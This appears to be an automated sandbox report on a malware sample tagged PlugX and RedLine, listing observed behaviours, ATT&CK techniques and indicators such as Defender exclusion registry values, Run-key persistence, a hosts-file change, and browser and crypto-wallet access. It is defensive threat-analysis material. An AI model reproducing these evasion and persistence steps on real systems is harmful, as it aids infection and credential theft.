plugx | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Blocklisted process makes network request 64 IoCs

flow	pid	Process
119	2412	MsiExec.exe
121	2412	MsiExec.exe
122	2412	MsiExec.exe
124	2412	MsiExec.exe
126	2412	MsiExec.exe
129	2412	MsiExec.exe
131	2412	MsiExec.exe
132	2412	MsiExec.exe
133	2412	MsiExec.exe
134	2412	MsiExec.exe
135	2412	MsiExec.exe
136	2412	MsiExec.exe
137	2412	MsiExec.exe
138	2412	MsiExec.exe
139	2412	MsiExec.exe
140	2412	MsiExec.exe
141	2412	MsiExec.exe
142	2412	MsiExec.exe
143	2412	MsiExec.exe
144	2412	MsiExec.exe
145	2412	MsiExec.exe
146	2412	MsiExec.exe
147	2412	MsiExec.exe
148	2412	MsiExec.exe
149	2412	MsiExec.exe
150	2412	MsiExec.exe
151	2412	MsiExec.exe
152	2412	MsiExec.exe
153	2412	MsiExec.exe
154	2412	MsiExec.exe
155	2412	MsiExec.exe
156	2412	MsiExec.exe
157	2412	MsiExec.exe
158	2412	MsiExec.exe
159	2412	MsiExec.exe
160	2412	MsiExec.exe
161	2412	MsiExec.exe
162	2412	MsiExec.exe
163	2412	MsiExec.exe
164	2412	MsiExec.exe
165	2412	MsiExec.exe
166	2412	MsiExec.exe
167	2412	MsiExec.exe
168	2412	MsiExec.exe
169	2412	MsiExec.exe
170	2412	MsiExec.exe
171	2412	MsiExec.exe
172	2412	MsiExec.exe
173	2412	MsiExec.exe
174	2412	MsiExec.exe
175	2412	MsiExec.exe
176	2412	MsiExec.exe
177	2412	MsiExec.exe
178	2412	MsiExec.exe
179	2412	MsiExec.exe
180	2412	MsiExec.exe
181	2412	MsiExec.exe
182	2412	MsiExec.exe
183	2412	MsiExec.exe
184	2412	MsiExec.exe
185	2412	MsiExec.exe
186	2412	MsiExec.exe
187	2412	MsiExec.exe
188	2412	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ultra.exe

Executes dropped EXE 39 IoCs

pid	Process
2024	Install.tmp
1776	Ultra.exe
1032	ultramediaburner.exe
1932	ultramediaburner.tmp
748	ZHarenujezhi.exe
1432	Laniriradi.exe
564	UltraMediaBurner.exe
3600	KiffMainE1.exe
3768	001.exe
112	installer.exe
2212	gpooe.exe
2300	jfiag3g_gg.exe
2976	google-game.exe
3100	jfiag3g_gg.exe
3200	huesaa.exe
3292	jfiag3g_gg.exe
3496	askinstall39.exe
3332	setup.exe
3756	Setup_v3.exe
908	005.exe
2208	Fessura.exe.com
2308	SunLabsPlayer.exe
2452	jfiag3g_gg.exe
3508	Fessura.exe.com
3748	RegAsm.exe
3008	AdvancedWindowsManager.exe
3372	AdvancedWindowsManager.exe
3504	AdvancedWindowsManager.exe
2764	AdvancedWindowsManager.exe
5252	AdvancedWindowsManager.exe
5656	AdvancedWindowsManager.exe
7564	conhost.exe
7596	data_load.exe
7572	lighteningplayer-cache-gen.exe
7876	jfiag3g_gg.exe
8068	jfiag3g_gg.exe
7612	jfiag3g_gg.exe
2384	jfiag3g_gg.exe
8040	AdvancedWindowsManager.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral8/files/0x0003000000013166-154.dat	upx
behavioral8/files/0x0003000000013166-153.dat	upx
behavioral8/files/0x0003000000013166-156.dat	upx
behavioral8/files/0x000300000001317c-174.dat	upx
behavioral8/files/0x000300000001317c-172.dat	upx
behavioral8/files/0x000300000001317c-176.dat	upx
behavioral8/files/0x000300000001317c-171.dat	upx
behavioral8/files/0x000300000001317c-186.dat	upx
behavioral8/files/0x000300000001317c-188.dat	upx
behavioral8/files/0x000300000001317c-185.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1628	Install.exe
2024	Install.tmp
2024	Install.tmp
2024	Install.tmp
2024	Install.tmp
1032	ultramediaburner.exe
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
112	installer.exe
112	installer.exe
2212	gpooe.exe
2212	gpooe.exe
112	installer.exe
2212	gpooe.exe
2212	gpooe.exe
2844	MsiExec.exe
3200	huesaa.exe
3200	huesaa.exe
2844	MsiExec.exe
2064	cmd.exe
2308	SunLabsPlayer.exe
3200	huesaa.exe
3200	huesaa.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2308	SunLabsPlayer.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
112	installer.exe
2412	MsiExec.exe
2412	MsiExec.exe
2412	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
3128	MsiExec.exe
2208	Fessura.exe.com
3128	MsiExec.exe
2412	MsiExec.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
2308	SunLabsPlayer.exe
3508	Fessura.exe.com
3748	RegAsm.exe
1764	taskeng.exe
1764	taskeng.exe
1764	taskeng.exe
3512	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NXfSHgjpzLhX = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Vaesaeloqite.exe\""	Ultra.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gpooe.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	ip-api.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3508 set thread context of 3748	3508	Fessura.exe.com	128

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\temp_files	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\index.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\Windows Portable Devices\Vaesaeloqite.exe	Ultra.exe
File created	C:\Program Files (x86)\lighteningplayer\libssp-0.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlc.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\regstr	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSICC6D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE202.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3EB6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI543A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE58C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI607C.tmp	msiexec.exe
File created	C:\Windows\Installer\f755b88.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8DB2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E49.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4BF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID370.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f755b88.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF1EC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6722.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI964C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6EFF.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9283.tmp	msiexec.exe
File created	C:\Windows\Installer\f755b8a.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI58FC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f755b8a.ipi	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Installer\f755b8c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI73C2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7699.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9B3C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC0B8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DC4.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3948	schtasks.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2920	bitsadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2524	taskkill.exe
2672	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "327008093"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0ce8169e541d701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e4500000000002000000000010660000000100002000000032b6a026e4a236fc60cf827c8fdd62b7fc481cc288e5b06ee3b8038612cd9480000000000e8000000002000020000000fcf9dc0eef0371c00b879359996a9e51434bf69d1d44e158f85992364e728d8390000000205e8f48d13df40f7c47028f8c0174cdc9038bf22edb286ad624e195bc313427ec7ac7a5a15ec53b415c05d41bfc905d661c978124cc32c67b0f3a4181b63a8e22f3bd0aa794768551e48d900fc0761ae05b715b2fadc7a71d3719da808f4cdd1dc681ed71b7e4415dd227cc02a94308a605d7df3766554d4f00e4a82e0ed9db31febfcebce4a11a9123a0f819a7180b40000000ddeab70fdb4ba916d02c42ad59de167fd59ed5aa2c9d3917a1295e3ffaa2328f28785053b931ef5bdff204bac7d9ca3b29f2915e5b42fba6568bb7a4d744fbc2	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{85050211-ADD8-11EB-9984-DABA49B2525C} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e450000000000200000000001066000000010000200000005b3fac9d2629dd58e154c3e845570973228ec2909c1bdf4c105395f58363bd2a000000000e8000000002000020000000de55b77f22792bfd7f0dc4e451ff88e7d29a16be98f70869e4bdf66aff30ec4320000000e27cee6eb8a6cd7093b26b0bbf5cbb647548f99e79ae673212a1a8064ef520a6400000003d2ce446ba59cf012b8e78a9db4d4c18833178e554e0a4f4bf776e21b77b83d8a692a4b3c32b3e9a9bd002f7f38fed3a5cc36ca74f17cbaa9673571f2c017fab	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe

Modifies data under HKEY_USERS 23 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
